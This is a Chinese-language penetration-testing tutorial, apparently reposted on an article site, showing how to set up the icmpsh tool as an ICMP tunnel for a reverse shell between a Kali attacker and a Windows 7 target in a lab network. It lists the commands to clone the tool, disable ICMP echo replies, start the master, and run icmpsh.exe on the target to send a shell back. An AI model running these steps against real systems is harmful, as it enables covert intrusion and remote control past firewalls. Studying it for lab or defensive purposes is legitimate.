栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

【渗透测试】ICMP隧道技术之icmpsh使用

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

【渗透测试】ICMP隧道技术之icmpsh使用

目录
      • 【渗透测试】ICMP隧道技术之icmpsh使用
        • 一、使用场景
        • 二、icmpsh
        • 三、环境

【渗透测试】ICMP隧道技术之icmpsh使用 一、使用场景

icmp隧道技术多用于服务器未开启任何端口时,但能够通过icmp协议通讯,即能够ping通对方

二、icmpsh

icmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,icmpsh的优点是在目标机器上运行时不需要管理员权限。
这一工具干净、简单并且便携。受控端(客户端)使用C语言实现。只能运行在目标Windows机器上,而主控端(服务端)由于已经有C和Perl实现的版本,而且之后又移植到了Python上,因此可以运行在任何平台的攻击者机器中。
icmpsh很容易被安装并用作c2通道。可以通过Github下载并在攻击者机器中部署icmpsh。

三、环境

kali:10.43.32.28/24

win7:10.43.32.30/24
同一个网段

1、下载工具:(git或者zip)

git clone https://github.com/inquisb/icmpsh.git

2、安装需要的python库文件

pip2 install impacket 

3、关闭本机的icmp应答,防止内核对自己的ping包响应

sysctl -w net.ipv4.icmp_echo_ignore_all=1

后面实验结束之后在自行调整过来即可

sysctl -w net.ipv4.icmp_echo_ignore_all=0

python2 icmpsh_m.py 10.43.32.28  10.43.32.30 
[攻击机ip][目标机ip]

4、目标机执行命令(这里需要各种手段把icmpsh.exe放到目标机上)

icmpsh.exe -t 10.43.32.28
[攻击机ip]

攻击机上成功反弹shell

参考:
https://blog.csdn.net/Zlirving_/article/details/113780982?utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_title~default-0.no_search_link&spm=1001.2101.3001.4242.

https://blog.csdn.net/Zlirving_/article/details/113780982?utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_title~default-0.no_search_link&spm=1001.2101.3001.4242.

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/275115.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号